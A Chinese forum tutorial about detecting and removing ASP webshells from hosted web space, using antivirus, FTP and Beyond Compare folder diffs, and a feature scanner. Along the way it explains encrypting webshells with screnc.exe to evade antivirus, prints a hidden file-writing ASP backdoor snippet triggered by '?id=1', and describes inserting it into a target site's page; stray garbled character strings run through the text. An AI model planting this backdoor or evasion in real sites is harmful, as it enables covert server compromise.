asp后门、asp木马大清理

秋风舞落叶

网上的一些防范asp木马的教程都基于提前防范的基础之上，例如：禁止FSO，利用NTFS限制用户目录等等。这些方法虽然有效，但是都是基于提前防范的，而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
0 H, Z6 R1 B' M) w0 _, e
% v5 v+ G7 x. q7 }通过帮朋友整理web空间摸索出了一些技巧，这些技巧还挺管用，不敢独享，拿出来共享。

一．技巧1：杀毒软件查杀
5 e& i( T1 c' ]
一些朋友可能在成功得到上传权限之后，上传的asp木马是一些非常有名的asp木马，例如：cmdasp，海洋顶端木马，这些木马虽然功能强大，但是早已经被杀毒软件列入了黑名单，所以利用杀毒软件对web空间中的文件进行扫描，可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马，木马标注为：Script.ASP.Rootkit.10.a，在瑞星的网站上搜索一下，可以知道这就是海洋顶端木马。

+ N% q3 D2 b" W% y, u& g/ @利用这种方法，可以有效的对抗一些小菜上传的asp木马，效果明显。
1 t+ I9 e1 k3 K, Z
: ^# b& ^# T, u6 W( \二．技巧2：FTP客户端对比

. h0 R0 k& Z9 P/ U" E* r上面的方法虽然对菜鸟入侵者比较管用，但是遇到稍微有点意识的入侵者来说，几乎失去效果，因为他们完全可以对asp木马进行伪装，加密，使其躲藏杀毒软件，这样的手法比较多，我个人比较喜欢微软开发个的一个asp加密小工具：screnc.exe，screnc.exe是一款ASP加密程序，加密的程式比较安全，使代码完全改变，使用也非常简单。只需要在命令下输入：
% M+ ^$ H& M5 J1 F( G8 c/ q# z
screnc.exe，得到帮助命令：Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉，根据提示，只需要输入：screnc.exe 要加密的asp木马名 输出的asp木马名，就可以完成加密伪装。
' F( F. @, X5 s% p
经过加密之后，记事本打开查看，可以看到标签：〈% ……%〉，〈script〉〈/script〉
8 A( I. f/ ^' A# P2 j6 o
7 q8 o- c; I1 v: Y2 ?  o# {4 F+ q等标签内的代码成为一些“乱码”，而杀毒软件查杀asp木马是通过搜索关键字来查杀，着阿姨能够显然就躲过查杀。
- ]. |$ G) Y4 D# w3 O6 U- n
+ s3 p+ Y$ k! I7 O* A盛大官方网站被黑，挂的网页木马代码就是利用screnc.exe来加密的，过了好几天才被发现，可见加密伪装手法的高超。
- ~/ `' }' D+ o
所以要采取另外的措施对付这种加密伪装的asp木马，我们可以利用一些FTP客户端软件（例如cuteftp，FlashFXP）提供的文件对比功能，通过对比FTP的中的web文件和本地的备份文件，发现是否错出可疑文件。

这里以FlashFXP进行操作讲解。

步骤1：打开FlashFXP，在左边窗口中跳转到本地web备份文件目录，在右边的FTP窗口中跳转到web目录下。
6 q/ D3 i3 B/ Y8 t7 t
步骤2：点工具栏中的“工具”，选择其中的“比较文件夹命令”，即可进行对比文件夹，速度非常快。

我们可以清楚的看到196个对象被过滤，在FTP空间中多出了这样几个asp文件：.asp，2005.asp等，这十有八九就是入侵者留下的asp后门，打开确认一下即可。
三．技巧3：用Beyond Compare 2进行对比
+ F8 K& V% ~) [/ f$ K- G; K
上面的利用FTP客户端对比文件的方法，虽然有效，但是遇到渗透入文件的asp木马，那就无能为力了，这里介绍一款渗透性asp木马，可以将代码插入到指定web文件中，平常情况下不会显示，只有使用触发语句才能打开asp木马，其隐蔽性非常高。代码如下：

8 }% `3 H! k6 n4 {〈%
8 F% ?+ ^: b  Z5 t( t0 k
on error resume next

% u: D, f, J3 K+ X  \0 `id=request("id")
5 E4 Q+ |) R( a3 t
, ?& t5 S# G* L8 u8 y& Dif request("id")=1 then
4 c- |: m5 G& Z6 S: r- a4 L
testfile=Request.form("name")
5 k5 S- z- o: O* J* e8 c
2 Z8 j0 C5 e+ V, _1 U6 r# `, Lmsg=Request.form("message")
/ h! G" H! F* }& ~5 `, c# j& m
: I/ R( S! |& nset fs=server.CreatObject("scripting.filesystemobject")

9 @2 ?- Z" S% {' [set thisfile=fs.openTestFile(testfile,8,True,0)

thisfile.Writeline(""&msg&"")
& A4 \3 d- O) D  u# \
thisfile.close
) ?1 j$ b' H/ A- T/ K
* Q7 u8 R; k- X4 E6 Iset fs=nothing

  `/ b: X# N" F8 J/ w: l%〉

〈from method="post" Action="保存"?id=1〉
# {% g) e; C; t: f2 N
( Z0 k6 ]" d$ F5 _) B* x/ I〈input type="text" size="20" name="Name"
# M/ g% V3 ?& E! f3 x
3 V0 O7 k$ P* v. X; o7 Y" KValue=〈%=server.mappath("XP.ASP")%〉〉
7 n( p5 ~5 B6 ]5 c' Z0 i
〈textarea name="Message" class=input〉
6 ^4 }/ ]6 G' H, s7 k4 ~9 t
- {! ^7 N" X  R/ N
〈/textarea〉

& a# l# Y3 [1 k  B: I# e/ m〈input type="Submit" name="send" Value="生成"

class=input〉
3 v$ J7 W  h$ G  B* G: ^) J
, G. T' Z8 o) z. F# k9 V〈/from〉
5 t( J' p! D' P8 B" ~: b' \$ D% }1 z
4 i# d+ q( `- m' _7 o& w% o〈%end if%〉

- R, ]3 }( O5 Y$ Z* i. s注意：在修改目标主机的web文件时，要注意这样的文件修改后没有效果，即含有类似于：〈!--#include file="inc/conn.asp"--〉这样的文件包含命令，这样的代码存在时，加入asp代码后根本不会显示出脚本后门，但是脚本后门代码不会影响原文件的显示和功能。

假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改，插入了脚本后门代码，那么打开的方式是：www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1，有了这些字符，才能保证脚本后门显示出来！普通情况下打开www. target..com/editor_InsertPic.asp?id=1，是不会露出破绽的。

) R: `9 c/ ~/ G5 p! C4 _这招真是asp木马放置中非常狠的，如果遇到这样的情况，该怎么办？我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。

: |; T+ l8 D- X# Z) S, I+ lBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示，查看方便。并且支持多种规则对比。
6 ^/ R7 h1 n2 l" U: e& ]
7 e$ y) z0 T2 m0 E看我来利用它完成渗透性asp木马的查找。

( [* T6 C- V* U1 w) O步骤1：打开Beyond Compare 2，点工具栏中的“比较任务”，选择其中的选项：新建，在“比较模式”中选择“比较两个文件夹”。进入一下步，选择需要对比的两个文件夹路径，即备份过的网站文件以及从FTP上下载的网站文件，再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
+ ?% _5 Y, v5 g" l  ~8 x7 E
- P. j' X" a4 H; f5 C6 z2 Y步骤2：比较完毕，软件界面左右两边分别显示了比较的结果，从中可以很容易找到哪个目录多出了什么文件。
) B- L6 I2 g' F, g8 C
步骤3：文件名相同，但是大小不同的文件，会被软件用另外的颜色标注出来，选择上它们，然后选择工具栏的“操作”中的“比较内容”功能，即可展开两个文件的详细内容，从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧！
5 l  B0 g$ I8 ?  v/ g( I; \7 O

四．技巧4：利用组件性能找asp木马
( @; t! q. w. G& r
5 r0 O* M4 s0 O; p6 k4 M$ Q/ o9 d上面分门别类的介绍了几种asp木马的放置与查杀技巧，一般的菜鸟，老鸟恐怕都是利用上面的方法来放置asp木马吧！所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧？呵呵！先别急，还有一种BT的asp木马放置方法，你可能很难想到，放置思路是这样的：在目标web空间中寻找一个不常用的，比较合适的asp文件，打开它对其进行代码精简，然后再将渗透asp木马的代码插入，再对其进行精简，直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门，一般的入侵者恐怕很难做到这一点，因为要精简代码的同时还要保证asp木马的功能不会错误。
  ]4 I7 ?3 ]7 {% @
如果你恰恰遇到一个这样的入侵者，那么该怎么才能查出被他放置的asp木马呢？你可能认为这已经不太可能了，呵呵！完全可能，看我拿出宝贝来：思易asp木马追捕。

- Q! y# {- _4 W& r0 q1 V9 u$ j它是一款专门检索各种asp文件所带功能的asp软件，通过搜索asp木马含有的特殊字符，以及搜索利用变量创建对象及静态对象建立的代码，来找出可能含有疑点的asp文件，从而有效的防范asp木马。
1 Y, o! A/ G+ O& g
3 G! @! Z, d& Y6 q& |( N% R使用非常简单，只需要将文件asplist2.0.asp上传到web空间下，然后在地址拦中打开，就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马，这些功能也都是asp木马常用的：FSO，WS，SHELL，XML等等。

一般的web文件很少具有这样的功能，只有那些可恶的asp木马才具有，可以看到一些文件具备了相当多的功能，这时候，就可以打开这些文件来确认是否是asp木马，非常有效。
0 |0 {- ^" C# r8 i% v
大家在查找web空间的asp木马时，最好几种方法结合起来，这样就能有效的查杀被隐藏起来的asp木马。

秋风舞落叶